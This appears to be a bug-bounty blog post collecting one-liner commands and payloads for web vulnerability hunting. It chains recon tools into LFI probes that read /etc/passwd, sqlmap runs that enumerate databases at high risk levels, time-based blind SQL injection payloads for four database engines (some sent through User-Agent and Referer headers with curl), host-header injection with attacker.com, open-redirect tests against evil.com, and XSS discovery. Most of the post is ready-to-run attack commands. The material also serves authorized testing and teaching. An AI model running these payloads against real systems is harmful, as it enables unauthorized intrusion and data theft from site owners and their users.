Many experienced and penetration testers, bug hunter or other people that work in offensive security use well-crafted one-liners to automate specific parts of their workflow — from passive recon to vulnerability detection.
In this post I’ll share some collections of tools and one-liner payloads designed to automate the discovery of common web vulnerabilities such as XSS, SQLi, SSRF, LFI, open redirect, idor, keys, secrets, etc. Instead of building full frameworks, these short commands combine widely-used utilities like gf, httpx, ffuf, and gau to produce fast, repeatable, and high-signal results — often with a single line of code.
One Liner to find LFI
cat targets.txt | (gau || hakrawler || waybackurls || katana) | grep "=" | dedupe | httpx -silent -paths lfi_wordlist.txt -threads 100 -random-agent -x GET,POST -status-code -follow-redirects -mc 200 -mr "root:[x*]:0:0:"
|
waybackurls king.ph | gf lfi | qsreplace "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'
|
| For single URL:
Using lostsec
paramspider -d yourtarget.com -o urls.txt
cat output/urls.txt | sed 's/FUZZ//g' > final.txt
python3 lostsec.py -l final.txt -p payloads/xor.txt -t 5
|
echo yourtarget.com | gau --mc 200 | urldedupe > urls.txt
cat urls.txt | grep -E ".php|.asp|.aspx|.cfm|.jsp" | grep '=' | sort > output.txt
cat output.txt | sed 's/=.*/=/' > final.txt
python3 lostsec.py -l final.txt -p payloads/xor.txt -t 5
|
echo yourtarget.com | katana -d 5 -ps -pss waybackarchive,commoncrawl,alienvault -f qurl | urldedupe > output.txt
katana -u yourtarget.com -d 5 | grep '=' | urldedupe | anew output.txt
cat output.txt | sed 's/=.*/=/' > final.txt
python3 lostsec.py -l final.txt -p payloads/xor.txt -t 5
|
With SQLMap to find SQLi
| For Single domain:
subfinder -d example.com -all -silent | httpx-toolkit -td -sc -silent | grep -Ei 'asp|php|jsp|jspx|aspx'
|
| find URLs with parameters (common SQLi entry points):
echo https://example.com | gau | uro | grep -E ".php|.asp|.aspx|.jspx|.jsp" | grep "=" > urls.txt
|
| You can also used katana
echo https://example.com | katana -d 5 -ps -pss waybackarchive,commoncrawl,alienvault -f qurl | uro | grep -E ".php|.asp|.aspx|.jspx|.jsp" > urls2.txt
|
| Using gf tool cleaned URLS with prone to SQL
cat urls1.txt urls2.txt | gf sqli | uro > cleaned-sql.txt
|
| Now you can run the sqlmap againts the URLS
sqlmap -m cleaned-sql.txt --batch --random-agent --tamper=space2comment --level=5 --risk=3 --drop-set-cookie --threads 10 --dbs
|
gf sqli > cleaned-sql.txt; sqlmap -m cleaned-sql.txt --batch --dbs --risk 2 --level 5 --random-agent
|
Sample SQLi Payloads
| MySQL
SELECT SLEEP(10);
0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z
1 AND (SELECT 1 FROM (SELECT COUNT(*), CONCAT(FLOOR(RAND()*2),(SELECT SLEEP(5))) AS x FROM information_schema.tables GROUP BY x) y);
' OR IF(1=1, SLEEP(10), 0)-- -
|
| PostgreSQL
SELECT pg_sleep(10);
' OR (CASE WHEN ((CLOCK_TIMESTAMP() - NOW()) < interval '0:0:10')
THEN (SELECT '1' || pg_sleep(10)) ELSE '0' END)='1
' OR 1=1; SELECT pg_sleep(5);--
-- Using random() for variability
' OR (SELECT CASE WHEN (random() < 0.5) THEN pg_sleep(5) ELSE pg_sleep(0) END);
|
| MsSQL
WAITFOR DELAY '00:00:10';
'; WAITFOR DELAY '00:00:05'; --
-- Conditional delay
IF (1=1) WAITFOR DELAY '0:0:10';
-- Using IF EXISTS for more realism
'; IF EXISTS (SELECT * FROM users) WAITFOR DELAY '00:00:07';
|
| Oracle
BEGIN DBMS_PIPE.RECEIVE_MESSAGE('a',10); END;
' OR 1=1; BEGIN DBMS_PIPE.RECEIVE_MESSAGE('a',10); END;--
-- Conditional check with delay
DECLARE v INTEGER; BEGIN IF 1=1 THEN DBMS_PIPE.RECEIVE_MESSAGE('a',10); END IF; END;
|
User-Agent: 0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z
X-Forwarded-For: 0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z
Referer: '+(select*from(select(if(1=1,sleep(20),false)))a)+'"
|
time curl -s -H "User-Agent: 0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z" "https://yourtarget.com/vulnerable-endpoint"
time curl -s -H "X-Forwarded-For: 0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z" "https://yourtarget.com/vulnerable-endpoint"
time curl -s -H "Referer: '+(select*from(select(if(1=1,sleep(20),false)))a)+'\"" "https://yourtarget.com/vulnerable-endpoint"
time curl "https://yourtarget.com/page.php?id=if(now()=sysdate(),sleep(10),0)/*'XOR(if(now()=sysdate(),sleep(10),0))OR'"XOR(if(now()=sysdate(),sleep(10),0))OR"*/"
|
| Using Waybackurls and Gau
cat collections.txt | while read url; do curl -H "Host: attacker.com" "$url"; done
|
| Using FFuF
ffuf -u https://target.com -H "Host: FUZZ" -w hosts.txt
|
Detect Open Redirect vulnerabilities with one-liner
| When you have URLS collected:
cat urls.txt | gau --o finalurls1.txt
cat urls.txt | katana -d 2 -o finalurls2.txt
cat urls.txt | urlfinder -o finalurls3.txt
cat urls.txt | hakrawler > finalurls4.txt
|
| Merge all the URLS collected:
cat urls1.txt urls2.txt urls3.txt | uro | sort -u | tee final.txt
|
| Now you can use filters to find Redirect Parameters
cat final.txt | grep -Pi "returnUrl=|continue=|dest=|destination=|forward=|go=|goto=|login\?to=|login_url=|logout=|next=|next_page=|out=|g=|redir=|redirect=|redirect_to=|redirect_uri=|redirect_url=|return=|returnTo=|return_path=|return_to=|return_url=|rurl=|site=|target=|to=|uri=|url=|qurl=|rit_url=|jump=|jump_url=|originUrl=|origin=|Url=|desturl=|u=|Redirect=|location=|ReturnUrl=|redirect_url=|redirect_to=|forward_to=|forward_url=|destination_url=|jump_to=|go_to=|goto_url=|target_url=|redirect_link=" | tee redirect_params.txt
|
| Find Redirect Parameters with gf tool
cat final.txt | gf redirect | uro | sort -u | tee redirect_params.txt
|
cat redirect_params.txt | qsreplace "https://evil.com" | httpx-toolkit -silent -fr -mr "evil.com"
|
With custom list of Open Redirects Payloads
cat redirect_params.txt | while read url; do cat path/to/wordlist.txt | while read payload; do echo "$url" | qsreplace "$payload"; done; done | httpx-toolkit -silent -fr -mr "google.com"
|
Using gau and gf
echo target.com -all | gau | gf redirect | uro | while read url; do cat path/to/wordlist.txt | while read payload; do echo "$url" | qsreplace "$payload"; done; done | httpx-toolkit -silent -fr -mr "google.com"
|
Using curl to detect Open Redirect
cat urls.txt | qsreplace "https://evil.com" | xargs -I {} curl -s -o /dev/null -w "%{url_effective} -> %{redirect_url}\n" {}
|
Finding XSS with One-Liner
Detect URLs with parameters
echo example.com | gau | gf xss | uro | Gxss | kxss | tee xss_urls.txt
|
| Cleaning the results
cat xss_urls.txt | grep -oP '^URL: \K\S+' | sed 's/=.*/=/' | sort -u > finalurls.txt
|
| Run open redirect tool for automation:
Reading .js file to find RXSS and Open Redirect with linkfinder
cat js.txt | while read url; do echo "Processing URL: $url" >> link-output.txt
python ~/path/to/your/linkfinder.py -d -i $url -o cli >> link-output.txt
echo "═━═━═━═━═━═━═━═━═━═━═━═━═━═━═━═━═━═━═━═━═━═" >> link-output.txt
done
|
There are many payloads, tools, and one-liner commands available on the internet, but I haven’t tried them all yet. In this post, I will continue to update it’ every time I discover new payloads, tools, or one-liners for detecting vulnerabilities.
If you liked my article please leave a respect on my at HackTheBox Profile
